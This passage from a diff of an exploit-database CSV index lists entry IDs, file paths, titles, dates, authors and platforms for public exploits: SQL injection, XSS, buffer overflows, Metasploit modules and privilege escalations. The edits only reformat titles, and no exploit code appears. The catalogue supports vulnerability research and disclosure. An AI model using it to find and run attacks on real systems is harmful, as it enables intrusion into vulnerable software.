Appliance web_client_user_guide.html lang Parameter Traversal - Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0 33624,platforms/php/webapps/33624.txt,"vBulletin 3.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'safe_mode' Restriction-Bypass",2010-02-11,"Grzegorz Stachowiak",php,dos,0 @@ -30345,7 +30345,7 @@ id,file,description,date,author,platform,type,port 33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Inclusion",2010-02-24,JIKO,php,webapps,0 33679,platforms/php/webapps/33679.txt,"TRUC 0.11 - 'login_reset_password_page.php' Cross-Site Scripting",2010-02-28,snakespc,php,webapps,0 33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta - 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Inclusion",2010-02-28,"cr4wl3r ",php,webapps,0 -33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 Installation Script Unauthorized Access",2010-02-27,indoushka,php,webapps,0 +33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 - Installation Script Unauthorized Access",2010-02-27,indoushka,php,webapps,0 33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 - 'loyalty_enu/start.swe' Cross-Site Scripting",2010-03-01,Lament,multiple,remote,0 33683,platforms/php/webapps/33683.txt,"Article Friendly - 'filename' Parameter Local File Inclusion",2010-03-01,"pratul agrawal",php,webapps,0 33684,platforms/php/webapps/33684.txt,"Blax Blog 0.1 - 'girisyap.php' SQL Injection",2010-03-01,"cr4wl3r ",php,webapps,0 @@ -30416,7 +30416,7 @@ id,file,description,date,author,platform,type,port 33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 dijit\tests\_testCommon.js theme Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0 33765,platforms/multiple/webapps/33765.txt,"Dojo Toolkit 1.4.1 doh\runner.html Multiple Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0 33766,platforms/php/webapps/33766.txt,"Joomla! 'com_as' Component - 'catid' Parameter SQL Injection",2010-03-16,N2n-Hacker,php,webapps,0 -33767,platforms/novell/remote/33767.rb,"Novell eDirectory 8.8.5 DHost Weak Session Cookie Session Hijacking",2010-03-14,Metasploit,novell,remote,0 +33767,platforms/novell/remote/33767.rb,"Novell eDirectory 8.8.5 - DHost Weak Session Cookie Session Hijacking",2010-03-14,Metasploit,novell,remote,0 33787,platforms/php/webapps/33787.txt,"RepairShop2 - index.php Prod Parameter XSS",2010-03-23,kaMtiEz,php,webapps,0 33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Parameter Local File Inclusion",2010-03-17,7Safe,php,webapps,0 33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0 @@ -30459,8 +30459,8 @@ id,file,description,date,author,platform,type,port 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,Metasploit,multiple,remote,8888 33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0 33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0 -33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 -33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 +33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch - Malformed 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 +33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component - 'id' Parameter SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps,0 33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0 33814,platforms/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0 @@ -30498,7 +30498,7 @@ id,file,description,date,author,platform,type,port 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - (.nkuser) File Creation NULL Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0 33851,platforms/php/webapps/33851.txt,"WordPress TimThumb 2.8.13 WebShot Plugin/Theme - Remote Code Execution (0Day)",2014-06-24,@u0x,php,webapps,0 -33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0 +33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0 33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0 33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Parameter Cross-Site Scripting",2010-04-24,Liscker,php,webapps,0 @@ -30510,9 +30510,9 @@ id,file,description,date,author,platform,type,port 34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection",2010-06-15,"L0rd CrusAd3r",php,webapps,0 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'username' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0 -33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,Metasploit,hardware,remote,80 -33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,Metasploit,hardware,remote,80 -33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,Metasploit,linux,remote,40007 +33862,platforms/hardware/remote/33862.rb,"D-Link - authentication.cgi Buffer Overflow",2014-06-24,Metasploit,hardware,remote,80 +33863,platforms/hardware/remote/33863.rb,"D-Link - hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,Metasploit,hardware,remote,80 +33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM - av-centerd Command Injection",2014-06-24,Metasploit,linux,remote,40007 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0 33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0 34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injection",2010-06-14,"High-Tech Bridge SA",php,webapps,0 @@ -30535,7 +30535,7 @@ id,file,description,date,author,platform,type,port 33888,platforms/php/webapps/33888.txt,"ProArcadeScript - 'search.php' Cross-Site Scripting",2010-04-27,Sid3^effects,php,webapps,0 33889,platforms/php/webapps/33889.txt,"SmartBlog 1.3 - SQL Injection / Cross-Site Scripting",2010-04-27,indoushka,php,webapps,0 33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 - Directory Traversal",2010-04-27,"John Leitch",windows,remote,0 -33891,platforms/java/remote/33891.rb,"HP AutoPass License Server File Upload",2014-06-27,Metasploit,java,remote,5814 +33891,platforms/java/remote/33891.rb,"HP AutoPass License Server - File Upload",2014-06-27,Metasploit,java,remote,5814 33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,Metasploit,windows,local,0 33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,Metasploit,windows,local,0 33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 @@ -30582,7 +30582,7 @@ id,file,description,date,author,platform,type,port 33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 - Remote Denial of Service",2010-04-29,"Bisphemol A",windows,dos,0 33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script - 'listtest.php' SQL Injection",2010-02-09,JIKO,php,webapps,0 33988,platforms/php/remote/33988.txt,"PHP 5.x (5.3.x 5.3.2) - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 -33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,Metasploit,windows,remote,9002 +33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet - Arbitrary File Upload",2014-07-07,Metasploit,windows,remote,9002 33929,platforms/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0 33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS",2014-07-02,Provensec,php,webapps,80 33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products - 'n6plugindestructor.asp' Cross-Site Scripting",2010-05-07,"Ruben Santamarta ",asp,webapps,0 @@ -30634,13 +30634,13 @@ id,file,description,date,author,platform,type,port 34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA - 'list' Parameter Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0 34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local,0 34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0 -34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! index.php controller Parameter Traversal - Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! index.php controller Parameter Traversal - Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal - Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! - index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 -34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,Metasploit,windows,remote,20010 +34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter - Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow",2014-07-08,Metasploit,windows,remote,20010 34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0 34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",php,webapps,0 34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0 @@ -30690,9 +30690,9 @@ id,file,description,date,author,platform,type,port 34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0 34059,platforms/windows/remote/34059.py,"Kolibri WebServer 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0 34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0 -34063,platforms/hardware/remote/34063.rb,"D-Link info.cgi POST Request Buffer Overflow",2014-07-14,Metasploit,hardware,remote,80 +34063,platforms/hardware/remote/34063.rb,"D-Link - info.cgi POST Request Buffer Overflow",2014-07-14,Metasploit,hardware,remote,80 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,Metasploit,hardware,remote,80 -34065,platforms/hardware/remote/34065.rb,"D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",2014-07-14,Metasploit,hardware,remote,1900 +34065,platforms/hardware/remote/34065.rb,"D-Link - Unauthenticated UPnP M-SEARCH Multicast Command Injection",2014-07-14,Metasploit,hardware,remote,1900 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0 34067,platforms/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,php,webapps,0 34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery",2010-01-01,"Truong Thao Nguyen",php,webapps,0 @@ -30736,7 +30736,7 @@ id,file,description,date,author,platform,type,port 34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0 34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 -34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 +34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0 34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection",2009-09-21,learn3r,php,webapps,0 @@ -30761,7 +30761,7 @@ id,file,description,date,author,platform,type,port 34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0 34131,platforms/windows/local/34131.py,"Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443 -34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 +34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 - mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - ptrace/sysret Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0 34161,platforms/php/webapps/34161.txt,"WordPress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 @@ -30776,11 +30776,11 @@ id,file,description,date,author,platform,type,port 34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow PoC",2014-07-24,HyP,linux,dos,0 34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (64-bit) - Stored XSS",2014-07-25,"Dolev Farhi",multiple,webapps,0 34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 -34167,platforms/win_x86/local/34167.rb,"MQAC.sys Arbitrary Write Privilege Escalation",2014-07-25,Metasploit,win_x86,local,0 +34167,platforms/win_x86/local/34167.rb,"MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-25,Metasploit,win_x86,local,0 34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent XSS",2014-07-27,"Osanda Malith",php,webapps,0 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",php,webapps,0 -34363,platforms/multiple/remote/34363.rb,"Firefox toString console.time Privileged Javascript Injection",2014-08-19,Metasploit,multiple,remote,0 +34363,platforms/multiple/remote/34363.rb,"Firefox - toString console.time Privileged Javascript Injection",2014-08-19,Metasploit,multiple,remote,0 34172,platforms/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service",2014-07-27,Z3ro0ne,hardware,dos,0 34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - LFI",2014-07-27,"black hat",php,webapps,0 34174,platforms/windows/remote/34174.txt,"Enemy Territory: Quake Wars 1.5.12642.33243 - Buffer Overflow",2010-08-18,"Luigi Auriemma",windows,remote,0 @@ -30800,7 +30800,7 @@ id,file,description,date,author,platform,type,port 34190,platforms/php/webapps/34190.txt,"Oxwall 1.7.0 - Multiple CSRF / HTML Injection Vulnerabilities",2014-07-28,LiquidWorm,php,webapps,80 34191,platforms/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution Exploit",2014-07-28,LiquidWorm,php,remote,80 34192,platforms/linux/remote/34192.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow",2010-06-22,"Martin Barbella",linux,remote,0 -34194,platforms/asp/webapps/34194.txt,"Lois Software WebDB 2.0A Script Multiple SQL Injection",2010-06-24,"High-Tech Bridge SA",asp,webapps,0 +34194,platforms/asp/webapps/34194.txt,"Lois Software WebDB 2.0A Script - Multiple SQL Injection",2010-06-24,"High-Tech Bridge SA",asp,webapps,0 34195,platforms/php/webapps/34195.txt,"WordPress Cimy Counter 0.9.4 Plugin - HTTP Response Splitting / Cross-Site Scripting",2010-05-05,MustLive,php,webapps,0 34196,platforms/ios/webapps/34196.txt,"WiFi HD 7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,ios,webapps,0 34197,platforms/php/webapps/34197.txt,"AbleSpace 1.0 - 'news.php' SQL Injection",2010-06-25,JaMbA,php,webapps,0 @@ -30930,14 +30930,14 @@ id,file,description,date,author,platform,type,port 34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34324,platforms/php/webapps/34324.txt,"FestOS 2.3 - 'contents' Parameter Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk products_search.php search_category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 -34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution",2014-08-14,Metasploit,linux,remote,80 -34334,platforms/win_x86-64/remote/34334.rb,"VirtualBox 3D Acceleration Virtual Machine Escape",2014-08-14,Metasploit,win_x86-64,remote,0 +34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 - vmtadmin.cgi Remote Command Execution",2014-08-14,Metasploit,linux,remote,80 +34334,platforms/win_x86-64/remote/34334.rb,"VirtualBox - 3D Acceleration Virtual Machine Escape",2014-08-14,Metasploit,win_x86-64,remote,0 34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions - VBoxGuest.sys Privilege Escalation",2014-08-13,Metasploit,windows,local,0 34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - (.plf) Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0 34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation",2007-12-17,"cp77fk4r ",asp,webapps,0 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET Multiple SQL Injection",2009-12-17,bi0,asp,webapps,0 34345,platforms/java/webapps/34345.txt,"jCore - 'search' Parameter Cross-Site Scripting",2009-12-17,loneferret,java,webapps,0 -34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,Metasploit,windows,remote,8020 +34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate - Arbitrary File Upload",2014-09-09,Metasploit,windows,remote,8020 34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Parameter Remote Command Execution",2010-07-18,"Marshall Whittaker",cgi,webapps,0 34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0 34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion",2010-07-18,eidelweiss,php,webapps,0 @@ -30979,7 +30979,7 @@ id,file,description,date,author,platform,type,port 34387,platforms/php/webapps/34387.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0 34388,platforms/php/webapps/34388.txt,"SPIP 2.1 - 'var_login' Parameter Cross-Site Scripting",2010-07-28,dotsafe.fr,php,webapps,0 34389,platforms/php/webapps/34389.txt,"Impact Software Ad Peeps Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps,0 -34390,platforms/php/remote/34390.rb,"HybridAuth install.php PHP Code Execution",2014-08-21,Metasploit,php,remote,80 +34390,platforms/php/remote/34390.rb,"HybridAuth - install.php PHP Code Execution",2014-08-21,Metasploit,php,remote,80 34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0 34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0 34393,platforms/php/webapps/34393.txt,"Joomla! 'com_jigsaw' Component - 'controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0 @@ -31090,7 +31090,7 @@ id,file,description,date,author,platform,type,port 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 -34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,Metasploit,windows,remote,5466 +34517,platforms/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution",2014-09-01,Metasploit,windows,remote,5466 34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash PoC",2014-12-23,"Drozdova Liudmila",windows,dos,0 @@ -31114,7 +31114,7 @@ id,file,description,date,author,platform,type,port 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80 34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit (Python)",2014-09-05,"Robert Kugler",windows,dos,0 34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0 -34542,platforms/windows/remote/34542.c,"UltraVNC 1.0.8.2 DLL Loading Arbitrary Code Execution",2010-08-30,"Ivan Markovic",windows,remote,0 +34542,platforms/windows/remote/34542.c,"UltraVNC 1.0.8.2 DLL Loading - Arbitrary Code Execution",2010-08-30,"Ivan Markovic",windows,remote,0 34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 parameters.php device Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0 34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 idstatusframe.php Multiple Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0 34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 survey.php category Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0 @@ -31211,22 +31211,22 @@ id,file,description,date,author,platform,type,port 34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0 34652,platforms/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0 34653,platforms/php/webapps/34653.txt,"e107 0.7.23 - Multiple SQL Injection",2010-09-17,"High-Tech Bridge SA",php,webapps,0 -34654,platforms/windows/remote/34654.c,"SWiSH Max3 DLL Loading Arbitrary Code Execution",2010-09-20,anT!-Tr0J4n,windows,remote,0 +34654,platforms/windows/remote/34654.c,"SWiSH Max3 DLL Loading - Arbitrary Code Execution",2010-09-20,anT!-Tr0J4n,windows,remote,0 34655,platforms/php/webapps/34655.txt,"Open Classifieds Multiple Cross-Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps,0 34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 includes/video_ad.php pic_id Parameter XSS",2009-08-29,Moudi,php,webapps,0 34657,platforms/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 linkvideos_listing.php category Parameter XSS",2009-08-29,Moudi,php,webapps,0 -34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b templates/header1.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0 -34659,platforms/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0 -34660,platforms/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b embed.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0 -34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b info.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0 -34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b lyrics.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0 -34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b adult/video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0 +34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b - templates/header1.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0 +34659,platforms/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b - video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0 